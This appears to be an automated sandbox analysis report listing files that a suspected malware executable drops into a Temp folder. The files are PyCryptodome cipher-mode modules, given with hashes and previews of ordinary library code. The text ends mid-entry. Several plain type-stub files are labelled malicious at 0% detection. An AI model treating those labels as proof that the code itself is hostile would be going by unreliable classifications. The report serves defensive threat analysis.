                                                                                                                                            SHA-512:8029C5F0C2789E73A777C9F7609170DE099DDAF80CFDFDC912D2A48740661A5F831B729D7A2CCCC8A4A32CC22CE22480D4871615F49BCE958DB154B9120D4A3C
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CbcMode']....class CbcMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.... def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ccm.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25872
                                                                                                                                            Entropy (8bit):5.359526059929995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/q/qgU1Xl1wB3ziI4SiI4QuogPD8jLmv4SeWPj7KzPc4KqE6L:/5/wJDEI4VPWmvxeG7KsU
                                                                                                                                            MD5:E11F36C8C4A9CBE0796C2DCEC41726FD
                                                                                                                                            SHA1:7568F09415882FD8C1C2F520B7C852AB93D4979E
                                                                                                                                            SHA-256:991848B3E440CD8B51B36BE46C10B1802838E5E9372B49EBB5C4B33F301499E6
                                                                                                                                            SHA-512:CBA688616B4CDA3B8260A014AFCC29814CEF026C0428EEB4CC887149790B07CBD4B078E8AF367CEC0CB5899F6ADFA6527A6C176539C3CBBB2023C9B7E8BB1D10
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.a.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...e.d.d.d.................Z...G.d...d.e...............Z.d...Z.d.S.).z".Counter with CBC-MAC (CCM) mode....CcmMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_writeable_buffer)...strxor)...long_to_bytes)...BLAKE2s)...get_random_bytesc.....................$.....t...........d.d.|...............S.).N..Enum..)...type)...enumss.... .kC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Crypto\Cipher\_mode_ccm.py..enumr....3...s..............E.."..".."...............)...NOT_STARTED..PROCESSING_AUTH_DATA..PROCESSING_PLAINTEXTc.....................p.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....Counter with CBC-MAC (CCM)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides bo

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ccm.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1647
                                                                                                                                            Entropy (8bit):4.397477650476907
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CnbKT3fAbSUA9UUOHMnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cuuvUXUO8vesLeJLn8nlEF49
                                                                                                                                            MD5:91133F991531450E28EE3F680FBF6F20
                                                                                                                                            SHA1:BB3761FBD4A0F912A77258D73B30D7E43403130E
                                                                                                                                            SHA-256:5F0058DE990A9668E5B0CE2273E74E0D5BFDF79F5E6745DC9B8FAEB39822A9AD
                                                                                                                                            SHA-512:F5FAF2155B4D172D3DDAF556DF2EF28E5CE93CE81F471AED1D7215C658EF03C9DAB71FA3BDABD3133951A1A64EA628587F8390D330280518B2CA60F0E6451D74
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, overload, Dict, Tuple, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CcmMode']....class CcmMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. msg_len: int,.. assoc_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> CcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str:

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_cfb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10920
                                                                                                                                            Entropy (8bit):5.295317136675577
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:hn3jDCxEZXorrU4B/NU4DfZZkZZZZqj6PVnx:VrZXoXTBFTDnjsx
                                                                                                                                            MD5:393CAE34392F45D380ECD70712FFC34F
                                                                                                                                            SHA1:FA15CAB673307C7B40BE16D986117C8EC41817F8
                                                                                                                                            SHA-256:401118DEA55BE4ECA55B79414794B77175DEC96C15625B37A7241420796A7951
                                                                                                                                            SHA-512:4BF06C0063138B3A6391BDCC8D4EF3BAB48EA3DD258A30CCADC5EC0CF68134085FA15E1E98054C46218CEDE58FD05A4108382C8F3553824AA3816A71A9AE7C92
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.+.............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Counter Feedback (CFB) mode....CfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Crypto.Cipher._raw_cfba .... int CFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. size_t segment_len, /* In bytes */. void **pResult);. int CFB_encrypt(void *cfbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int CFB_decrypt(v

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_cfb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):753
                                                                                                                                            Entropy (8bit):4.690976940000698
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDDHo2YRyU1AOlsQRZFq6R5pFq6jI33ynFq6R5xnFq6jIF:1REP+LjT3lGNAYsEHnRNne3yFnR3Fne1
                                                                                                                                            MD5:652CF8ED15152064BFF8807277058B5A
                                                                                                                                            SHA1:D868B6EBCDF4B5AE76DD495FBD506879BCE96B88
                                                                                                                                            SHA-256:FA48D3431DA67394394BCFC79AFA506311A5579E9234299215B06514EC72EDEA
                                                                                                                                            SHA-512:2354A738EBA79324311746672CFB436ECB558212FCFC044030A1C932F0E6EC74E539A38994A1BB7F69D5B84EB2C2F49EDAE11243A8D4B11B6B304425FBE8334F
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CfbMode']......class CfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer,.. segment_size: int) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ctr.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15579
                                                                                                                                            Entropy (8bit):5.3327194767816986
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:2OGDPkH7KxiM16TsyriFfU4PkdU4fYrLEjnSknkjvjfAhSssTM:2Fb0SDw2fTPkdTfYrL0Skn+vj3sf
                                                                                                                                            MD5:AE1C90E5F1E3DBF86F039EFCFBB65061
                                                                                                                                            SHA1:34A7828D1007FB477FC1292A29B553446E4C743F
                                                                                                                                            SHA-256:352020EB6D2BF55A74E7B713FC95EE04351A6AF071886F3A14437246C25BA58E
                                                                                                                                            SHA-512:42814697BACEB7BE47615924245E0208FB617D7281E6DB648D7E9C08D778069C88041BD3DB5A7576600F8F1E8EB67A0622FC66364C7F2032CD0A5AB553FBF09F
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eM?.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Counter (CTR) mode....CtrMode.....N)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytes)..._copy_bytes..is_native_int)...long_to_bytesz.Crypto.Cipher._raw_ctra..... int CTR_start_operation(void *cipher,. uint8_t initialCounterBlock[],. size_t initialCounterBlock_len,. size_t prefix_len,. unsigned counter_len,. unsigned littleEndian,. void **pResult);. int CTR_encrypt(void *ctr

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ctr.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):827
                                                                                                                                            Entropy (8bit):4.593860739765962
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REP+LjT3Q6fUAY4AVjjnRNne3yFnR3Fne38:Y+rLcZVjTvesLeM
                                                                                                                                            MD5:8A35D43812049862067E29C878476C74
                                                                                                                                            SHA1:A12D8A91A7657976F857C769188B625FA27F0697
                                                                                                                                            SHA-256:D5EAD8152A6D1DA357A8B3B4D79E468B3A1201CB4406E83951F7B32F48A2FD1D
                                                                                                                                            SHA-512:18F5C59C21EFB6867FE1B837E0ECC55524B2382F0C95A493CEE012DB691C1B0D6D3BED81D46CDBEE48A9D4C11CE47726F38A98E398557141E90B794B61D25017
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['CtrMode']....class CtrMode(object):.. block_size: int.. nonce: bytes.... def __init__(self,.. block_cipher: SmartPointer,.. initial_counter_block: Buffer,.. prefix_len: int,.. counter_len: int,.. little_endian: bool) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_eax.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16128
                                                                                                                                            Entropy (8bit):5.3516714389406586
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:LwX+X6zFM4jDTFVyfTHMR/A7Ip47ai99kGz90cW3m/F:LjX6KwloIJu7amHz943s
                                                                                                                                            MD5:468F6F7D8049923F67B2391E37943617
                                                                                                                                            SHA1:C17962C6E423C96043C305AFD0E36F55ECAFA4B0
                                                                                                                                            SHA-256:A9FD3CE298DC3B8A9A44109947B1942B3DDF207874A281AD60C4DACFCBD77534
                                                                                                                                            SHA-512:D289DAD5AF18F6A634CE35D8F3514A55B22C084B47CD24D59B8BD5A3649EDE2B385FBD9AE92164A83787C95B1AEC33929EB89E4645AA32236F4C30234B616631
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.:.............................d.Z.d.g.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z..EAX mode....EaxMode.....N)...unhexlify)...byte_string..bord.._copy_bytes)...is_buffer)...strxor)...long_to_bytes..bytes_to_long)...CMAC..BLAKE2s)...get_random_bytesc.....................V.....e.Z.d.Z.d.Z.d...Z.d...Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....*EAX* mode... This is an Authenticated Encryption with Associated Data. (`AEAD`_) mode. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed,. and it will still be subject to authentication... The decryption step tells the receiver if the message comes. from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message -. including the header - has been modified or corrupted.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_eax.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1590
                                                                                                                                            Entropy (8bit):4.436811038410909
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7C/DsT3VEA9UbnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:c+AGXrvesLeJLn8nlEF49
                                                                                                                                            MD5:B414CB43B46387AD1B1B2AD15F66314E
                                                                                                                                            SHA1:DE8BFF4EE379D1F4A7DF3EC4051A3CB1D3DCB09E
                                                                                                                                            SHA-256:C5246506D2FF0E2B13BAE3A5D47467C47994932C24499FEFCF32126C39BF9611
                                                                                                                                            SHA-512:0788A2CF03A23CD2788A592E5C201F2632CABEF44B9094158A7B5A02B0AB97202C05562FD78F585554E7A4FEA2C862B885F3E5074792080285787F112CCB5F22
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Any, Union, Tuple, Dict, overload, Optional....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['EaxMode']....class EaxMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> EaxMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> No

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ecb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):8190
                                                                                                                                            Entropy (8bit):5.265778755351852
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:AQRS6kvV9AtXEshfxCx7l7mFadVgrPqBP6sQLR7DHdMwqc5p3hxhSmAJiqXq:Ad9psh27eaGv9Xh+JN6
                                                                                                                                            MD5:F6ADD26B4B48BFBA494ABE5991C0DB91
                                                                                                                                            SHA1:6270D583B457E4F1C73059CA64138F6BBFA431FD
                                                                                                                                            SHA-256:3853A04A3E41D042BDE3FA3A33F9DD31C9623D6C35DE4EDB02564D9108FEDFFE
                                                                                                                                            SHA-512:36827FEEDAB8A43A5DEEC6E94E43491A78BACA2EE7DB90CD4D89BCC9FDC2AF2B027D3922993BED1DC9FA1291695914EFCD02A23E280F0B021B1B0B56B1DE3EB9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eQ!........................r.....d.Z.d.g.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z".Electronic Code Book (ECB) mode....EcbMode.....)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_bufferz.Crypto.Cipher._raw_ecbak.... int ECB_start_operation(void *cipher,. void **pResult);. int ECB_encrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_decrypt(void *ecbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int ECB_stop_operation(void *state);. c.....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ecb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):611
                                                                                                                                            Entropy (8bit):4.857553785112337
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1+sJal9lvIY3FDlD1AZlUFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REP+LjT3PJAbCnRNne3yFnR3Fne38
                                                                                                                                            MD5:12949DC06561F6F7C431BFB79A4F5D05
                                                                                                                                            SHA1:68C7903BA776DC6B8C9B2F3EDA82A9033C001FCC
                                                                                                                                            SHA-256:652C427E0BBCA4838334715C3BF18979F96EB0B3FCFBA8D67992A9D8F7A3CA4D
                                                                                                                                            SHA-512:5B2F563099AFD298366B739064E648ADFA3B42C0A9906A95D48F6AE8B48EBD0EBA01FB864FFB2F5F0BE81493DBE0DBD4DB0EECB6300B35C53FBEBBA92B27E2A5
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union, overload....from Crypto.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = [ 'EcbMode' ]....class EcbMode(object):.. def __init__(self, block_cipher: SmartPointer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_gcm.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):24763
                                                                                                                                            Entropy (8bit):5.41511665486075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:/ShWw4SgqFGRVwkJRkPM4SjL8Tn4klTfZkgMybU7BS7ocYybm7meag9:/bw4SgqMOU9L+9OgMybUE7x/JM
                                                                                                                                            MD5:CC4A7CDD83E2ECA16BA0CD668E24C7AE
                                                                                                                                            SHA1:8A61E8B6BB501C0DA1413436FACC1C0AEBFBFBAC
                                                                                                                                            SHA-256:249FF5A47BA847DE2323432B62217211F637DE662A906DF562385F3246FB270A
                                                                                                                                            SHA-512:4B1AEC3FB1A560F4DCCB3A42627BB74EBC6142B539DB29EA4D32CA619C12FCE14700973D36E8D9BFE420DEA03DF5B4548B7184A38D3A236CDF0089E236FE82C4
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.U........................,.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z...e...............Z.d...Z...e...............Z...G.d...d.e...............Z d...Z!..e!d.d.................Z"..G.d...d.e...............Z#d...Z$d.S.).z..Galois/Counter Mode (GCM)....GcmMode.....)...unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)...BLAKE2s)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr)..._cpu_featuresa`.... int ghash_%imp%(uint8_t y_out[16],. const uint8_t block_data[],. size_t len,. const uint8_t y_in[16],. const void *exp_key);. int ghash_expand_%imp%(const uint8_t h[16],. void **ghash_tables);. int ghash_destroy_%imp%(void *ghash_tables);.c..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_gcm.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1586
                                                                                                                                            Entropy (8bit):4.431900531457141
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                            MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                            SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                            SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                            SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ocb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):21445
                                                                                                                                            Entropy (8bit):5.341745289246349
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:iqHGPqi2jpRJF44h3R422oD9eWWEne47l8vadgETqZr0Txp9h5j:isGPqJRjhBYZQqa9qhmP9h5j
                                                                                                                                            MD5:73656658F6FE5B3B135762619FAB09A1
                                                                                                                                            SHA1:48F3CFAC1B74E62C0F21AA25430C560B96E7121C
                                                                                                                                            SHA-256:18FCE2FE11B299A461C8948B217200751611D151190CD88F66E548B78F236265
                                                                                                                                            SHA-512:338DFAD2A6684E5F57A4889FBDA2B37124A9FF8259415C9C3E25017C3020B84063750F3C259A35C152580A40CF7BCA5A8887FDEACF383AE1504E0D9B459BDCC1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.O..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).ah....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Crypto.Cipher import AES. >>> from Crypto.Random import get_random_bytes. >>>

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ocb.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1267
                                                                                                                                            Entropy (8bit):4.510576229003074
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                            MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                            SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                            SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                            SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Crypto\Cipher\_mode_ofb.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10307
                                                                                                                                            Entropy (8bit):5.268925541267186
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:Bby5NPuxI7HU4JWVU4w8GZZkZZZZAj17/oAAAFJ:k37HTJWVTwTjFv
                                                                                                                                            MD5:996615F27329EA6FFD55F7A2F77EAC7E
                                                                                                                                            SHA1:11C6C1E4621EF1192F4880404A1166B4153CF977
